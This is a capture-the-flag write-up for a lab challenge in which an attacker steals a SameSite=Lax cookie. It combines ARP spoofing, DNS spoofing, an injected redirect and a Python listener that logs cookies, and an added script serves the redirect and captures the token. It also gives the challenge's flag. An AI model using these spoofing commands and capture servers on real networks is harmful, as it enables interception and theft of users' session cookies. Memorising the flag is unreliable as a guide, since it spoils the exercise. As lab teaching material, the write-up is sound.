Token 7: SameSite Lax Cookie
Token: PCCC{C00k13_B4nd1t_09_13qv}
Objective
Steal the tokenLax cookie from the browser on webvictim.pccc. The cookie is scoped to external.target.pccc, a site served over plain HTTP on port 80, and is marked SameSite=Lax.
Hosts
- webvictim.pccc: 10.0.91.136 (victim browser)
- web.pccc: 10.0.91.135 (site the victim visits; where the redirect is injected)
- DNS server used by the victim: 10.0.91.133 (ARP-spoofed in Step 1)
- Attacker: 10.0.91.138 (the address the spoofed name resolves to in Step 2)
- Cookie domain: external.target.pccc
Understanding SameSite: Lax
- Lax cookies are sent on every same-site request and on cross-site top-level navigations that use a safe method (a GET from a clicked link, a redirect, or window.location)
- NOT sent on cross-site subresource loads (images, iframes, scripts), on fetch/XHR from another site, or on cross-site POST form submissions
- To steal: make the victim's browser perform a top-level GET navigation to external.target.pccc while that name resolves to a host you control
Method: DNS Spoof + Cookie Capture
Step 1: ARP spoof victim ↔ DNS server (10.0.91.133)
Turn on IP forwarding on the attacker (net.ipv4.ip_forward=1) before starting, so the victim's real DNS lookups (including the one for web.pccc) still succeed while you sit in the middle. Then poison both ends of the pair:
arpspoof -i eth1 -t 10.0.91.136 10.0.91.133 &
arpspoof -i eth1 -t 10.0.91.133 10.0.91.136 &
Step 2: Spoof DNS for external.target.pccc
Answer the victim's DNS queries for external.target.pccc with the attacker's IP (10.0.91.138). dnsspoof takes a hosts-style file:
echo "10.0.91.138 external.target.pccc" > /tmp/dns.txt
dnsspoof -i eth1 -f /tmp/dns.txt
Because the victim's queries now pass through you, your forged answer arrives before the real server's. If the victim already has the real address cached, the spoof only takes effect once that entry expires.
Step 3: Set up fake server on port 80
nc -nlvp 80
Or a simple Python HTTP server that logs cookies:
from http.server import HTTPServer, BaseHTTPRequestHandler

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log the Host the browser thinks it reached (confirms the spoof) and any cookies it attached
        print("Host:", self.headers.get('Host'), "Cookie:", self.headers.get('Cookie'), flush=True)
        self.send_response(200)
        self.end_headers()

# Port 80 needs root; bind all interfaces so the spoofed name lands here
HTTPServer(('0.0.0.0', 80), Handler).serve_forever()
Step 4: Trigger navigation to external.target.pccc
Inject JavaScript into a web.pccc response so the victim's browser performs a top-level navigation:
window.location = 'http://external.target.pccc/';
A link the victim clicks, a meta refresh, or a 302 redirect works equally well, since each is a top-level GET navigation. An injected <img> or iframe does not: those are subresource loads, and the browser withholds Lax cookies from them. Note that Step 1 only puts you between the victim and its DNS server; to rewrite web.pccc responses you also need to be on the victim ↔ web.pccc path (ARP-spoof that pair too), or simply add web.pccc to the same dnsspoof file and serve the redirect page yourself.
Step 5: Capture the cookie
When the victim’s browser navigates to external.target.pccc (which resolves to your IP), it sends the Lax cookie with the request:
Cookie: tokenLax=PCCC{C00k13_B4nd1t_09_13qv}
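Steps 3 and 4 can be served by one process on the attacker host: it returns the redirect page when the victim's browser arrives asking for web.pccc, and logs the cookie when the follow-up navigation arrives for external.target.pccc. This is an added example and not code from the original write-up. It assumes both hostnames have been pointed at the attacker (the write-up only spoofs external.target.pccc), and the Host-based dispatch together with the parse_cookies and decide helpers are my own additions.

```python
from http.server import HTTPServer, BaseHTTPRequestHandler

# Added example (not from the original write-up). Assumption: dnsspoof maps
# BOTH names below to this host, so the victim's browser lands here twice.
CAPTURE_HOST = "external.target.pccc"   # domain the SameSite=Lax cookie is scoped to
REDIRECT_HOST = "web.pccc"              # site the victim is assumed to visit first
TARGET_COOKIE = "tokenLax"

# window.location is a top-level GET navigation, so Lax cookies ride along.
# An <img> or fetch() to the same URL would NOT carry the cookie.
REDIRECT_PAGE = (b"<html><body><script>"
                 b"window.location='http://external.target.pccc/';"
                 b"</script></body></html>")


def parse_cookies(header):
    """Split a Cookie request header ('a=1; b=2') into a dict; None/empty -> {}."""
    cookies = {}
    for part in (header or "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def decide(host, cookie_header):
    """Pure dispatch logic, kept out of the handler so it can be unit-tested.
    Returns (status, body, captured_token); captured_token is None unless the
    request is for CAPTURE_HOST and carries TARGET_COOKIE."""
    host = (host or "").split(":", 1)[0].lower()      # drop an optional :port
    if host == CAPTURE_HOST:
        token = parse_cookies(cookie_header).get(TARGET_COOKIE)
        return 200, b"ok", token
    if host == REDIRECT_HOST:
        return 200, REDIRECT_PAGE, None
    return 404, b"", None                             # some other name: ignore


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body, token = decide(self.headers.get("Host"),
                                     self.headers.get("Cookie"))
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
        if token is not None:
            print(f"[+] {TARGET_COOKIE} from {self.client_address[0]}: {token}", flush=True)

    def log_message(self, fmt, *args):
        # Show the Host header on every hit so a wrong or missing spoof is obvious
        print(f"[*] {self.client_address[0]} GET {self.path} "
              f"Host={self.headers.get('Host')}", flush=True)


if __name__ == "__main__":
    # Port 80 needs root; bind every interface so the spoofed names resolve here.
    HTTPServer(("0.0.0.0", 80), Handler).serve_forever()
```

Run it as root with dnsspoof's hosts file listing both names; the first hit shows Host=web.pccc and receives the redirect, the second shows Host=external.target.pccc and prints the captured tokenLax value. Any other Host (for example a stale cached answer sending the victim elsewhere) is logged but answered with 404, which makes a misconfigured spoof easy to spot.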
Why It Works
SameSite=Lax restricts which cross-site requests carry the cookie, not which host the cookie's domain resolves to. A top-level GET navigation is exactly the case Lax permits, so:
- Spoofing DNS points external.target.pccc at your IP
- The injected redirect makes the victim's browser perform a top-level navigation to that name
- The browser attaches the Lax cookie, and because the site is plain HTTP on port 80 there is no certificate check to stop the forged host from receiving it
Over HTTPS the same DNS spoof would fail at the TLS handshake, and a Secure-flagged cookie would never be sent to http://external.target.pccc in the first place.
Cleanup
pkill arpspoof
pkill dnsspoof